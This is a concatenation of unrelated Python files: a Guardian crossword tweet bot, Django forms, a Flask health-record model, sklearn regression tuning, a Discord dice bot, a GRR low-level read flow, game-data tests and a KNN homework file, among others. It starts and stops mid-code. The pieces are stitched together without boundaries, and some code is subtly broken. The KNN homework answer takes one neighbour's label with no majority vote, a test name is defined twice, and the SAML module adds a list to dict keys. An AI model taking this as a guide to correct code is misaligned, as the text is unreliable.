by {setter}. ", f"Thanks to {setter} for today's @guardian cryptic. ", f"{setter} sets the @guardian cryptic today. "] middles = [f"Try '{clue}' to get you going! ", f"Have a go at '{clue}' and see how you get on! ", f"One from the archives: '{clue}'. "] ends = [f"Check it out here: {url}", f"The whole crossword can be found here: {url}", f"Have a go at the whole puzzle here: {url}"] return choice(openings) + choice(middles) + choice(ends) def main(): with open('./clues.pickle', 'rb') as f: clues = pickle.load(f) crossword_id = get_crossword_id() if crossword_id in [clue.xword_id for clue in clues]: pass # return # This crossword is already in the database todays_clues = scrape_clues(crossword_id) clues += todays_clues with open('./clues.pickle', 'wb') as f: pickle.dump(clues, f) # Save the new clues just scraped setter = todays_clues[0].setter patterns = defaultdict(list) setters = defaultdict(list) for clue in clues: *words, pattern = clue.raw_clue.split() patterns[len(words)].append(pattern) # For tacking on eg. (3,4) setters[clue.setter].append(' '.join(words)) # Every clue by a setter if setter in setters.keys(): if len(setters[setter]) > 500: model = markovify.NewlineText(setters[setter]) else: model = markovify.NewlineText([clue for setter in setters.keys() for clue in setters[setter]]) clue = model.make_short_sentence(50) clue += ' ' + choice(patterns[len(clue.split())]) tweet = make_tweet(setter, crossword_id, clue) print(tweet) api = Twython(**credentials) api.update_status(status=tweet) if __name__ == '__main__': main()
from typing import * class Solution: def flipAndInvertImage(self, A: List[List[int]]) -> List[List[int]]: for i in A: i.reverse() for i in A: for n,j in enumerate(i): if j == 1: i[n] = 0 else: i[n] = 1 return A
# -*- encoding: utf-8 -*- from django import forms from .models import * from django.contrib.auth import authenticate class RegisterQuestionForm(forms.Form): email = forms.EmailField( label='Su Email', max_length='50', required=True, ) title = forms.CharField( label='Titulo', max_length='50', required=True) question = forms.CharField(label='Pregunta:', max_length='300', widget=forms.Textarea(attrs={'cols':80,'rows':30}), required=False, ) apelativo = forms.CharField( label='Apelativo', max_length='10', required=False) image = forms.ImageField(required=False) class RegisterAnswerForm(forms.Form): email = forms.EmailField(label='Su E-mail:', max_length='70', required=False, ) answer = forms.CharField(label='Su Respuesta', max_length='300', widget=forms.Textarea(attrs={'cols':80,'rows':30}))
from flask_restful import reqparse from db import db class Patient_info(db.Model): __tablename__ = "Health_info" id = db.Column(db.Integer, primary_key=True) patient_id = db.Column(db.Integer) Glucose = db.Column(db.Integer) SBP = db.Column(db.Integer) DBP = db.Column(db.Integer) time = db.Column(db.String) def __init__(self, patient_id, Glucose, SBP, DBP, time): self.patient_id = patient_id self.Glucose = Glucose self.SBP = SBP self.DBP = DBP self.time = time health_info = reqparse.RequestParser() health_info.add_argument("Glucose", type=int, required=True, help="Enter your latest blood glucose reading") health_info.add_argument("SBP", type=int, required=False) # სისტოლური წნევა _ წნევა როცა გული შეიკუმშა health_info.add_argument("DBP", type=int, required=False) # დიასტოლური წნევა _ წნევა როცა გული მოდუნდა def json(self): return {"patient_id": self.patient_id, "Glucose": self.Glucose, "SBP": self.SBP, "DBP": self.DBP, "time": self.time} @classmethod def find_by_id(cls, patient_id): return cls.query.filter_by(patient_id=patient_id).all() @classmethod def last_entry(cls, patient_id): return cls.query.filter_by(patient_id=patient_id).order_by(cls.id.desc()).first() def save_to_db(self): db.session.add(self) db.session.commit() def delete_from_db(self): db.session.delete(self) db.session.commit()
class LinkedNode(): def __init__(self , data): self.next = None self.data = data class LinkedList(): def __init__(self): self.head = None def InsertAtHead(self , newHeadData): newNode = LinkedNode(newHeadData) if self.head : newNode.next = self.head self.head = newNode def remove(self , removeData): curNode = self.head if curNode.data == removeData: self.head = self.head.next while curNode.next: if curNode.next.data == removeData: curNode.next = curNode.next.next break curNode = curNode.next def InsertAtTail(self, newTailData): newNode = LinkedNode (newTailData) if self.head: curNode = self.head while curNode.next: curNode = curNode.next curNode.next = newNode else: self.head = newNode def printList (self): curNode = self.head while curNode: print curNode.data curNode = curNode.next def printListreverse (self): printStack = [] curNode = self.head while curNode: # printStack.push(curNode.data) unfortunately lists do not have push... insert(index, data) printStack.insert( 0 , curNode.data ) curNode = curNode.next print printStack def InsertInOrder(self , newData): newNode = LinkedNode (newData) if self.head: curNode = self.head while curNode.next: if curNode.next.data > newNode.data: newNode.next = curNode.next curNode.next = newNode break curNode = curNode.next curNode.next = newNode else: self.head = newNode if __name__ == "__main__": # initialize our head node intolist = [2,4,8,6,10] head = LinkedNode( 1 ) linkedList = LinkedList() linkedList.head = head # initialize linked list finsihed for i in intolist: linkedList.InsertInOrder (i) linkedList.remove(1) linkedList.remove(10) linkedList.remove(8) linkedList.remove(6) linkedList.printList() linkedList.printListreverse()
import numpy as np from sklearn.cross_decomposition import PLSRegression from sklearn.svm import SVR from sklearn.ensemble import RandomForestRegressor import warnings from sklearn.model_selection import validation_curve warnings.filterwarnings("ignore") import random from sklearn.model_selection import RandomizedSearchCV from scipy import stats import warnings warnings.filterwarnings("ignore") def rf(dspectra,Y, param, metric,cv=5): params = {'n_estimators': np.linspace(abs(param['n_estimators'] - 29), param['n_estimators'] + 50, 5, dtype=int), 'min_samples_leaf': np.linspace(abs(param['min_samples_leaf'] - 0.04), param['min_samples_leaf'] + 0.05, 3), 'min_samples_split': np.linspace(abs(param['min_samples_split'] - 0.04), param['min_samples_split'] + 0.05, 3)} gsc = RandomForestRegressor(n_jobs=-1, bootstrap=True, max_features=param['max_features'], random_state=random.seed(1234)) random_cv = RandomizedSearchCV(gsc, param_distributions=params, scoring=metric, cv=cv, n_jobs=-1, iid=False) random_cv.fit(dspectra, Y) if metric=='neg_mean_squared_error': score=np.sqrt(-random_cv.best_score_) else: score=random_cv.best_score_ cv_param=random_cv.best_params_ cv_param['max_features']=param['max_features'] return score, cv_param def rf_final_result(x_train, y_train,param): gsc = RandomForestRegressor(n_estimators=param['n_estimators'], bootstrap=True, min_samples_split=param['min_samples_split'], min_samples_leaf=param['min_samples_leaf'], max_features=param['max_features'], n_jobs=-1, random_state=random.seed(1234)) gsc.fit(x_train, y_train); return gsc def svr(dspectra,Y, param, metric,cv=5): params={'C': np.linspace(param['C']*.8,min(param['C']*1.2,400),3), 'gamma': np.linspace(param['gamma']*0.5, min(param['gamma']*1.5,0.008), 3)} svr = SVR(kernel='rbf') random_cv = RandomizedSearchCV(svr, param_distributions=params, scoring=metric, cv=cv, n_jobs=-1, iid=False) random_cv.fit(dspectra, Y) if metric == 'neg_mean_squared_error': score = np.sqrt(-random_cv.best_score_) else: score = random_cv.best_score_ return score, random_cv.best_params_ def svr_final_result(x_train, y_train, param): svr = SVR(kernel='rbf', C=round(param['C'],3), gamma=round(param['gamma'],5)) svr.fit(x_train, y_train); return svr def pls(dspectra,Y,ncomp,metric,cv=5): # Run PLS including a variable number of components, up to 25, and calculate RMSE maxComp=ncomp+3 minComp=max(ncomp-3,0) param_range = np.arange(minComp, maxComp, 1) train_scores, test_scores = validation_curve( PLSRegression(), dspectra, Y, param_name="n_components", param_range=param_range, scoring=metric, cv=cv, n_jobs=-1) test_scores_mean = np.mean(test_scores, axis=1) ses = stats.sem(test_scores, axis=1) ind = test_scores_mean.argmax() score = test_scores_mean[ind] diff = abs(test_scores_mean - score) arg_param = np.argmax(diff < ses[ind]) if metric=='neg_mean_squared_error': test_scores_mean=np.sqrt(-test_scores_mean) # ind=scores.argmin() # #Y=Y.flatten() # # best_res=preds[ind,:]-Y # # # # if ind>0: # # for i in range(ind): # # # # res=preds[i,:]-Y # # p=stats.f_oneway(best_res, res)[1] # # if p>0.05: # # ind=i # # break return [test_scores_mean[arg_param], param_range[arg_param]] def pls_final_result(x_train, y_train, param): pls=PLSRegression(param) pls.fit(x_train, y_train) # vips=prep.vip(x_train,pls ) return pls
from models.players import Player class PlayerView(): def ask_information(self, dataRequested): print('Please type the ' + dataRequested) def display(self, message): ''' Helper function to display a message ''' print(message) def display_players_name(self, players_to_display: list[Player]): ''' Display players names''' for index, player in enumerate(players_to_display): print(f'{index + 1}: {player}')
''' coordinates are [u,v], points are [x,y,z] ''' import math, random import util, tests random.seed(0) def sphere_eq(c): u,v = c x = math.cos(u)*math.sin(v/2) y = math.sin(u)*math.sin(v/2) z = -math.cos(v/2) return [x,y,z] def klein_eq(c): u,v = c # todo - check bounds on u,v h = 15 w = 5 r1 = .5 #2 r2 = 3 #5 #5 r = r1 + (r2-r1)*(math.sin(u+math.sin(u)/2)+1)/2 # math.atan2(dzdu, dxdu), assuming r constant dzdu = h*math.cos(u/2)/2 dxdu = w*-math.cos((1-math.cos(u/2))*math.pi) * math.sin(u/2)*math.pi/2 a = math.atan2(dzdu, dxdu) #print(u, a) x = w*-math.sin((1-math.cos(u/2))*math.pi) + r*math.sin(a)*math.cos(v) y = r*math.sin(v) z = h*math.sin(u/2) + r*-1*math.cos(a)*math.cos(v) return [x,y,z] for ui in range(0, 50): u = 2*math.pi*ui/50 klein_eq([u, 0]) tests.test_eq(klein_eq, 10000)
# user.py import discord from discord.ext import commands import random class DnD(commands.Cog): def __init__(self, bot): self.bot = bot self._last_member = None # commands @commands.command() async def roll(self, ctx, n, x): """roll n x: Rolls n dice of x sides""" roll = 0 #i = 0 for i in range(int(n)): rolledNumber = random.randint(1, int(x)) roll = roll + rolledNumber await ctx.send(n + "d" + x + " rolled: " + str(roll)) @commands.command() async def mroll(self, ctx, x, y, z): """roll x y z: Rolls x dice of y sides and adds z to the total""" roll = 0 #i = 0 for i in range(int(x)): rolledNumber = random.randint(1, int(y)) roll = roll + rolledNumber roll = roll + int(z) await ctx.send(x + "d" + y + " rolled with modifier " + z + ": " + str(roll))
from Funciones import * class Curso(): def __init__(self, nombre): self.nombre = nombre self.alumnos = [] self.materias = [] def agregarAlumno(self, alumno): """ :parametro alumno: object :return None """ self.alumnos.append(alumno) def agregarMateria(self, materia): """ :parametro materia: object :return None """ self.materias.append(materia) def promedio(self): # :return float promedios = [] for alumno in self.alumnos: promedios.append(alumno.promedioTotal()) return calcularPromedio(promedios)
from __future__ import annotations from typing import Any, TYPE_CHECKING from typing import Optional from sqlalchemy.ext.asyncio import AsyncEngine from virtool.data.transforms import AbstractTransform from virtool.data.transforms import apply_transforms from virtool.pg.utils import get_row_by_id from virtool.types import Document from virtool.uploads.models import SQLUpload from virtool.users.db import AttachUserTransform from virtool.utils import get_safely, base_processor if TYPE_CHECKING: from virtool.mongo.core import Mongo class ImportedFromTransform(AbstractTransform): """ Attach the upload and upload user data to an imported reference. """ def __init__(self, mongo: Mongo, pg: AsyncEngine): self._mongo = mongo self._pg = pg async def prepare_one(self, document: Document) -> Optional[Document]: try: upload_id = document["imported_from"]["id"] except KeyError: return None row = await get_row_by_id(self._pg, SQLUpload, upload_id) return await apply_transforms(row.to_dict(), [AttachUserTransform(self._mongo)]) async def attach_one( self, document: Document, prepared: Optional[Document] ) -> Document: if prepared is None: return document return {**document, "imported_from": prepared} PROJECTION = ["_id", "name", "data_type"] class AttachReferenceTransform(AbstractTransform): def __init__(self, mongo: "Mongo"): self._mongo = mongo async def prepare_one(self, document: Document) -> Any: reference_id = get_safely(document, "reference", "id") if reference_id: return base_processor( await self._mongo.references.find_one({"_id": reference_id}, PROJECTION) ) raise ValueError("Missing reference id") async def attach_one(self, document: Document, prepared: Any) -> Document: return {**document, "reference": prepared}
""" Loading is tricky to test: a new Python process is needed each time because of global state in GameData. The hacky approach here is to run pytest in a subproces on just that one test. """ import pytest import subprocess import sys import platform import os import gc import endless_sky.bindings as m from helpers import icky_global_state, empty_resources_dir, empty_config_dir @icky_global_state def test_GameData_simple(empty_resources_dir, empty_config_dir): (empty_resources_dir / "data" / "simple.txt").write_text('ship Canoe\n\tdescription "A boat."') m.GameData.BeginLoad([ "progname", "--resources", str(empty_resources_dir), "--config", str(empty_config_dir), ]) ships = m.GameData.Ships(); assert list(ships) == [("Canoe", ships.Get("Canoe"))] @icky_global_state def test_GameData_simple1(empty_resources_dir, empty_config_dir): (empty_resources_dir / "data" / "simple.txt").write_text('ship Canoe\n\tdescription "A boat."') m.GameData.BeginLoad([ "progname", "--resources", str(empty_resources_dir), "--config", str(empty_config_dir), ]) ships = m.GameData.Ships(); assert list(ships) == [("Canoe", ships.Get("Canoe"))] @icky_global_state def test_GameData_simple2(empty_resources_dir, empty_config_dir): (empty_resources_dir / "data" / "simple.txt").write_text('ship Kayak\n\tdescription "A sleeker boat for only one."') m.GameData.BeginLoad([ "progname", "--resources", str(empty_resources_dir), "--config", str(empty_config_dir), ]) ships = m.GameData.Ships(); assert list(ships) == [("Kayak", ships.Get("Kayak"))] @icky_global_state def test_GameData_ownership(empty_resources_dir, empty_config_dir): (empty_resources_dir / "data" / "simple.txt").write_text('ship Canoe\n\tdescription "A boat."') m.GameData.BeginLoad([ "progname", "--resources", str(empty_resources_dir), "--config", str(empty_config_dir), ]) ships = m.GameData.Ships(); canoe = ships.Get("Canoe") del canoe # segfault if Get used the default return value policy # This library does not ship with vanilla data, but it's always present in the # build enviroment so we might as well use it. @icky_global_state def test_GameData_full(empty_config_dir): m.GameData.BeginLoad([ "progname", "--resources", "./endless_sky/endless-sky", "--config", str(empty_config_dir), ]) # This might use a lot of memory (if sprites get loaded) assert len(m.GameData.Ships()) > 100 ships = m.GameData.Ships(); ships = dict(ships) s = ships['Shuttle'] del ships gc.collect() del s gc.collect() govts = m.GameData.Governments(); print(govts) govts = dict(govts) g = govts['Republic'] del govts gc.collect() del g gc.collect() outfits = m.GameData.Outfits(); outfits = dict(outfits) o = outfits['Hyperdrive'] del outfits gc.collect() del o gc.collect() planets = m.GameData.Planets(); planets = dict(planets) p = planets['Earth'] del planets gc.collect() del p gc.collect() systems = m.GameData.Systems(); systems = dict(systems) s = systems['Sol'] del systems gc.collect() del s gc.collect() # This used to segfault @icky_global_state def test_GameData_full(empty_config_dir): m.GameData.BeginLoad([ "progname", "--resources", "./endless_sky/endless-sky", "--config", str(empty_config_dir), ]) system = m.GameData.Systems()['Sol'] government = system.GetGovernment() del government humans = [] for planet_name, planet in m.GameData.Planets(): system = planet.GetSystem() if not system: continue system_name = system.Name() name = planet_name + ' ' + system_name if planet.GetSystem().GetGovernment().GetName() in ['Republic']: humans.append(name) assert len(humans) > 10
#!/usr/bin/env python """Flow that reads data low level.""" import logging from grr_response_core.lib.rdfvalues import read_low_level as rdf_read_low_level from grr_response_server import data_store from grr_response_server import file_store from grr_response_server import flow_base from grr_response_server import server_stubs from grr_response_server.databases import db from grr_response_server.rdfvalues import objects as rdf_objects # TODO: Consider allowing big files using external store. class ReadLowLevel(flow_base.FlowBase): """A low-level transfer mechanism for raw data from a device. This flow reads and collects `length` bytes from a given `path` starting at the provided `offset`. Returns to parent flow: A ReadLowLevelResult with information on the temporary file created with the raw data. """ category = "/Filesystem/" args_type = rdf_read_low_level.ReadLowLevelArgs def Start(self): """Schedules the read in the client (ReadLowLevel ClientAction).""" # TODO: Set `blob_size` according to `sector_block_size`. request = rdf_read_low_level.ReadLowLevelRequest( path=self.args.path, length=self.args.length, offset=self.args.offset) if self.args.HasField("sector_block_size"): request.sector_block_size = self.args.sector_block_size if not self.client_version or self.client_version >= 3459: self.CallClient( server_stubs.ReadLowLevel, request, next_state=self.StoreBlobsAsTmpFile.__name__) else: raise flow_base.FlowError("ReadLowLevel Flow is only supported on " "client version 3459 or higher (target client " f"version is {self.client_version}).") def StoreBlobsAsTmpFile(self, responses): """Stores bytes retrieved from client in the VFS tmp folder.""" if not responses.success: raise flow_base.FlowError(responses.status) file_size = 0 file_hash_from_client = None # Hash on the last buffer reference. blob_refs = [] smallest_offset = None biggest_offset = 0 for response in responses: file_size += response.blob.length if smallest_offset is None or response.blob.offset < smallest_offset: smallest_offset = response.blob.offset if response.blob.offset >= biggest_offset: biggest_offset = response.blob.offset file_hash_from_client = response.accumulated_hash blob_refs.append( rdf_objects.BlobReference( offset=response.blob.offset, size=response.blob.length, blob_id=rdf_objects.BlobID.FromSerializedBytes( response.blob.data))) if file_size < self.args.length: self.Log(f"Read less bytes than requested ({file_size} < " f"{self.args.length}). The file is probably smaller than " "requested read length.") elif file_size > self.args.length: raise flow_base.FlowError(f"Read more bytes than requested ({file_size} >" f" {self.args.length}).") # This raw data is not necessarily a file, but any data from the device. # We artificially create a filename to refer to it on our file store. alphanumeric_only = "".join(c for c in self.args.path if c.isalnum()) # TODO: Remove client_id from `tmp_filename` when bug is fixed. tmp_filename = f"{self.client_id}_{self.rdf_flow.flow_id}_{alphanumeric_only}" tmp_filepath = db.ClientPath.Temp(self.client_id, [tmp_filename]) # Store blobs under this name in file_store. file_hash_from_store = file_store.AddFileWithUnknownHash( tmp_filepath, blob_refs, use_external_stores=False) # Check if the file hashes match, and log in case they don't. file_hash_id_from_client = rdf_objects.SHA256HashID.FromSerializedBytes( file_hash_from_client.AsBytes()) if file_hash_id_from_client != file_hash_from_store: logging.warning( "Flow %s (%s): mismatch in file hash id in the storage (%s) and in the client (%s)", self.rdf_flow.protobuf.flow_id, self.client_id, file_hash_from_store, file_hash_from_client) path_info = rdf_objects.PathInfo.Temp(components=[tmp_filename]) path_info.hash_entry.sha256 = file_hash_from_store.AsBytes() path_info.hash_entry.num_bytes = file_size path_info.hash_entry.source_offset = smallest_offset # Store file reference for this client in data_store. data_store.REL_DB.WritePathInfos(self.client_id, [path_info]) result = rdf_read_low_level.ReadLowLevelFlowResult(path=tmp_filename) self.SendReply(result) def Done(self, responses): if not responses.success: raise flow_base.FlowError(responses.status.error_message)
import numpy as np import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt plt.rcParams['pdf.fonttype'] = 42 import bluepy cas_g = ['1p26', '1p28', '1p3', '1p32', '1p34', '1p36', '1p38', '1p4', '2p0'] cas_mvr = ['1p1', '1p15', '1p2', '1p21', '1p22', '1p23', '1p24', '1p25'] bcs_mvr = ['/gpfs/bbp.cscs.ch/project/proj9/simulations/nolte/variability/ca_scan_mvr/Ca%s/BlueConfig' % s for s in cas_mvr] bcs_g = ['/gpfs/bbp.cscs.ch/project/proj9/simulations/nolte/variability/ca_scan_g/Ca%s/BlueConfig' % s for s in cas_g] # bcs = ['/gpfs/bbp.cscs.ch/project/proj9/simulations/nolte/ei-balance/' \ # 'scan_layer5/Ca%s/BlueConfig' % s for s in cas] sim = bluepy.Simulation(bcs_mvr[0]) gids = np.array(list(sim.get_circuit_target())) gids_exc = np.random.permutation(np.intersect1d(np.array(list(sim.circuit.get_target('Excitatory'))), gids)) gids_inh = np.random.permutation(np.intersect1d(np.array(list(sim.circuit.get_target('Inhibitory'))), gids)) # bcs = bcs_0 names = ['MVR', 'det_syns'] for k, (bcs, cas) in enumerate(zip([bcs_mvr, bcs_g], [cas_mvr, cas_g])): fig, axs = plt.subplots(len(bcs), 2, figsize=(14, 14)) for i, bc in enumerate(bcs): print bc sim = bluepy.Simulation(bc) gids = np.array(list(sim.get_circuit_target())) od = sim.reports.spike.outdat ax = axs[i, 0] ax.set_xlim([0, 4000]) bins = np.linspace(0, 5000, 251) fr_norm = (bins[1] - bins[0])/1000.0 spikes = np.hstack(od.spikes_for_gids(gids_inh))[:100] ax.hist(spikes, bins=bins, histtype='step', color='blue', weights=np.ones(spikes.size) * fr_norm) spikes = np.hstack(od.spikes_for_gids(gids_exc))[:1000] ax.hist(spikes, bins=bins, histtype='step', color='darkred', weights=np.ones(spikes.size) * fr_norm) ax.set_xlabel('t (ms)') ax.set_ylabel('FR (Hz)') ax.set_title('[Ca2+] = %s mM' % cas[i]) ax = axs[i, 1] all_times = [] all_vmin = [] all_vmax = [] colors = [] for j, gid in enumerate(np.hstack([gids_inh[:100], gids_exc[:1000]])): #[np.random.permutation(gids.size)][:10000]): exc = sim.circuit.mvddb.get_gid(gid).mtype.synapse_class == 'EXC' times = od.spikes_for_gid(gid) times = times[times > 0.0] all_times.append(times) all_vmin.append(np.zeros(times.size) + j) all_vmax.append(np.zeros(times.size) + j + 10) color_options = ['blue', 'red'] colors += [color_options[exc] for t in times] ax.vlines(np.hstack(all_times), np.hstack(all_vmin), np.hstack(all_vmax), colors=colors, rasterized=True, linewidth=0.5) ax.set_xlabel('t (ms)') ax.set_ylabel('Cells') ax.set_title('[Ca2+] = %s mM' % cas[i]) plt.tight_layout() plt.savefig('ca_scan_%s.pdf' % names[k], dpi=300)
import numpy as np from sklearn import metrics,neighbors import sklearn from collections import Counter #------------------------------------------------------------------------- ''' Problem 1: k nearest neighbor In this problem, you will implement a classification method using k nearest neighbors. The main goal of this problem is to get familiar with the basic settings of classification problems. KNN is a simple method for classification problems. You need to install following python package: nose numpy scikit-learn You could type the following line in the terminal to install the package: pip3 install numpy pip3 install nose pip3 install sklearn ''' #-------------------------- def Terms_and_Conditions(): ''' By submitting this homework or changing this function, you agree with the following terms: (1) Not sharing your code/solution with any student before and after the homework due. For example, sending your code segment to another student, putting your solution online or lending your laptop (if your laptop contains your solution or your Dropbox automatically synchronize your solution between your home computer and your laptop) to another student to work on this homework will violate this term. (2) Not using anyone's code in this homework, build your own solution. For example, using some code segments from another student or online resources due to any reason (like too busy recently) will violate this term. Changing other people's code as your solution (such as changing the variable names) will also violate this term. (3) When discussing with any other student about this homework, only discuss high-level ideas or using pseudo-code. Don't discuss about the solution at the code level. For example, discussing with another student about the solution of a function (which needs 5 lines of code to solve), and then working on the solution "independently", however the code of the two solutions are exactly the same, or only with minor differences (like changing variable names) will violate this term. All violations of (1),(2) or (3) will be handled in accordance with the WPI Academic Honesty Policy. For more details, please visit: https://www.wpi.edu/about/policies/academic-integrity/dishonesty Historical Data: in one year, we ended up finding 25% of the students in the class violating this term in their homework submissions and we handled ALL of these violations according to the WPI Academic Honesty Policy. ''' #**************************************** ## CHANGE CODE HERE Read_and_Agree = True #if you have read and agree with the term above, change "False" to "True". #**************************************** return Read_and_Agree #-------------------------- def compute_distance(Xtrain, Xtest): ''' compute the Euclidean distance between instances in a test set and a training set Input: Xtrain: the feature matrix of the training dataset, a float python matrix of shape (n_train by p). Here n_train is the number of data instance in the training set, p is the number of features/dimensions. Xtest: the feature matrix of the test dataset, a float python matrix of shape (n_test by p). Here n_test is the number of data instance in the test set, p is the number of features/dimensions. Output: D: the distance between instances in Xtest and Xtrain, a float python matrix of shape (ntest, ntrain), the (i,j)-th element of D represents the Euclidean distance between the i-th instance in Xtest and j-th instance in Xtrain. For example, if we have a training set of 3 instances with 2 dimensional features: Xtrain = 1, 2 2, 1 2, 2 We also have a test dataset of 2 isntances: Xtest = 3, 4 5, 6 The Euclidean distance between the first test instance (1,2) and the first training instance (3,4) is computed as: D[0,0] = square_root( (1-3)^2 + (2-4)^2 ) = 2.828 Similarly we can compute all the pairs between Xtest and Xtrain, then D is a matrix of shape 2 X 3: D[i,j] is the Euclidean distance between the i-th instance in Xtest and the j-th instance in Xtrain. ''' ######################################### ## INSERT YOUR CODE HERE D = sklearn.metrics.pairwise.euclidean_distances(Xtest,Xtrain) ######################################### return D ''' TEST: Now you can test the correctness of your code above by typing `nosetests -v test1.py:test_compute_distance' in the terminal. ''' #-------------------------- def k_nearest_neighbor(Xtrain, Ytrain, Xtest, K = 3): ''' compute the labels of test data using the K nearest neighbor classifier. Input: Xtrain: the feature matrix of the training dataset, a float numpy matrix of shape (n_train by p). Here n_train is the number of data instance in the training set, p is the number of features/dimensions. Ytrain: the label vector of the training dataset, an integer python list of length n_train. Each element in the list represents the label of the training instance. The values can be 0, ..., or num_class-1. num_class is the number of classes in the dataset. Xtest: the feature matrix of the test dataset, a float python matrix of shape (n_test by p). Here n_test is the number of data instance in the test set, p is the number of features/dimensions. K: the number of neighbors to consider for classification. Output: Ytest: the predicted labels of test data, an integer numpy vector of length ntest. Note: you cannot use any existing package for KNN classifier. ''' ######################################### ## INSERT YOUR CODE HERE # number of testing instances inst = len(Xtest) # compute distances between test set and training set dist = compute_distance(Xtrain,Xtest) order = np.array([np.argpartition(row,K-1)[:K] for row in dist]) Ytest = [] for s in order: idx = s[K-2] Ytest.append(Ytrain[idx]) Ytest = np.array(Ytest) ######################################### return Ytest ''' TEST: Now you can test the correctness of your code above by typing `nosetests -v test1.py:test_k_nearest_neighbor' in the terminal. ''' #-------------------------------------------- ''' TEST Problem 2: Now you can test the correctness of all the above functions by typing `nosetests -v test1.py' in the terminal. If your code passed all the tests, you will see the following message in the terminal: ----------- Problem 1 (10 points in total)-------------- ... ok (3 points) compute_distance ... ok (5 points) k_nearest_neighbor ... ok (2 points) test on a dataset ... ok ---------------------------------------------------------------------- Ran 5 tests in 0.336s OK ERROR Message: If your code has an error, you will see an error message with the line number of the error: For example: ====================================================================== FAIL: (3points) test_compute_distance() ---------------------------------------------------------------------- Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/nose/case.py", line 198, in runTest self.test(*self.arg) File "test1.py", line 47, in test_compute_distance assert np.allclose(D, D_true, atol = 1e-4) AssertionError This error message means: (1) You are using python 3.6, See: "... Versions/3.6/lib/python3.6/ ... " (2) Your code failed in Line 47, the test_compute_distance function in test1.py file See: " ... File "test1.py", line 47, in test_compute_distance " (3) The specific test that failed is that the D should equals to the true answer D_true, but in your code, a different result is returned. See: " assert np.allclose(D, D_true, atol = 1e-4) AssertionError " Debug: To debug your code, you could insert a print statement before Line 47 of test1.py file: print(D) Then run the test again. Now after the error message, the value of D will be printed like this: -------------------- >> begin captured stdout << --------------------- [[1. 1.4 1. ] [2. 2. 2. ]] --------------------- >> end captured stdout << ---------------------- Then we know that the value of D output by your current code. ''' #--------------------------------------------
import os import numpy as np import sys import subprocess def createtxt(): print('Enter the number of the channel:\n') print('etau =1 , mutau=2 or tautau=3 (wo quotation)') x = int(input()) if (x== 1 or x== 2 or x== 3): print('VALID CHANNEL') if x==1: path="/Users/diegobarbosa/Desktop/Limits/LimitCardsMaker_Zprime_13TeV_2021/" channel="etau" path=path+channel os.chdir(path) print("Directory changed to" + channel + "+" + path) dir_list=os.listdir(path) os.system("hadd data.root DY+Jets_2016.root QCD_2016.root SingleTop_2016.root VV_2016.root W+Jets_2016.root ttbar_2016.root") if x==2: path="/Users/diegobarbosa/Desktop/Limits/LimitCardsMaker_Zprime_13TeV_2021/" channel="mutau" path=path+channel os.chdir(path) print("Directory changed to" + channel + "+" + path) dir_list=os.listdir(path) os.system("hadd data.root DY_2016.root QC_2016.root ST_2016.root TT_2016.root VV_2016.root WJ_2016.root") if x==3: path="/Users/diegobarbosa/Desktop/Limits/LimitCardsMaker_Zprime_13TeV_2021/" channel="tautau" path=path+channel os.chdir(path) print("Directory changed to" + channel + "+" + path) dir_list=os.listdir(path) os.system("hadd data.root DY+Jets_Histogram.root QCD_Histogram.root SingleTop_Histogram.root VV_Histogram.root W+Jets_Histogram.root tbar\{t\}_Histogram.root") else: print('Not a Valid Channel!') sys.exit() def main(): createtxt() if __name__ == '__main__': main()
__author__ = 'regu0004' # SAML attribute to verify affiliation with AFFILIATION_ATTRIBUTE = 'eduPersonAffiliation' # Values the RP can request in OpenID Connect parameter 'scope' in the Auth req. PERSISTENT_NAMEID = 'persistent' TRANSIENT_NAMEID = 'transient' # Supported claims in the Auth req DOMAIN = 'domain' COUNTRY = 'country' def get_affiliation_function(scope): """Returns the comparison function for the affiliation specified in the requested scope. :param scope: requested scope from the RP :return: function to verify the users affiliation """ for affiliation in AFFILIATIONS: if affiliation in scope: return AFFILIATIONS[affiliation] def _is_student(identity): return _contains_any(['student'], _get_affiliation_attribute(identity)) def _is_member(identity): return _contains_any(['member'], _get_affiliation_attribute(identity)) def _is_employee(identity): return _contains_any(['employee'], _get_affiliation_attribute(identity)) def _is_affiliated(identity): return _is_student(identity) or _is_employee(identity) or _is_member( identity) def _is_alumni(identity): return _contains_any(['alum'], _get_affiliation_attribute(identity)) def _is_faculty_or_staff(identity): return _contains_any(['faculty', 'staff'], _get_affiliation_attribute(identity)) def _contains_any(accepted_values, bag): for v in accepted_values: if v in bag: return v return None def _get_affiliation_attribute(identity): """ Return the list of affiliations. :param identity: attributes returned from IdP :return: list of affiliations, or empty list if the affiliation attribute does not exist """ return identity.get(AFFILIATION_ATTRIBUTE, []) # Mapping between the possible scope values for requesting verification of a certain affiliation AFFILIATIONS = { 'affiliated': _is_affiliated, 'student': _is_student, 'employee': _is_employee, 'faculty+staff': _is_faculty_or_staff, 'alum': _is_alumni } # All scope values we understand SCOPE_VALUES = AFFILIATIONS.keys() + [PERSISTENT_NAMEID, TRANSIENT_NAMEID]
''' Created on 2014. 11. 26. @author: user ''' from Orange import data from DoC import page, time as t, status, user_agent import split_session as ss import Feature_Set as fs import refine_data as rd from Analysis.Freq import ip_freq from Analysis.Freq import query_markov from time import time vDom = data.Domain([fs.ip, fs.DoC_t, fs.DoC_p, fs.DoC_ua, fs.DoC_s], False) def SimpsonIndex_count(basket): S = sum(basket) if S < 2: return 0 R = sum([x*(x-1) for x in basket if x > 1]) return float(R)/(S*(S-1)) def SimpsonIndex_prob(probDistbasket): return sum([p*p for p in probDistbasket]) def getDoCInstance(_ip_DataSet, IP): #ip_freq.add_value(IP) result = [IP] t_Data = [d["t_offset"].value for d in _ip_DataSet] sessList = ss.split_time(t_Data, 900) timeDoC = 0 for s in sessList: t_hist, t_bins = t.get_tHistogram(s, 15) timeDoC = max([timeDoC, t.getDoC(t_hist)]) ua_Dist = user_agent.getDoCDist(_ip_DataSet) p_Dist = page.getDoCDist(_ip_DataSet) result.append(timeDoC) result.append(SimpsonIndex_count(p_Dist.values())) try: result.append(1-SimpsonIndex_count(ua_Dist.values())) except AttributeError: result.append(None) result.append(status.get_404ratio(_ip_DataSet)) return result def getDoCTable(DataSet, indexMap): ip_List = list(set([x['ip'].value for x in DataSet])) DoC_Table = data.Table(vDom) DoCList = [] for i in ip_List: DoCList.append(getDoCInstance(DataSet.get_items_ref(indexMap[i]), i)) DoC_Table.extend(DoCList) return DoC_Table def DoC_filtering(DataSet, DoCTable, t_range=(0,1), u_range=(0,1), 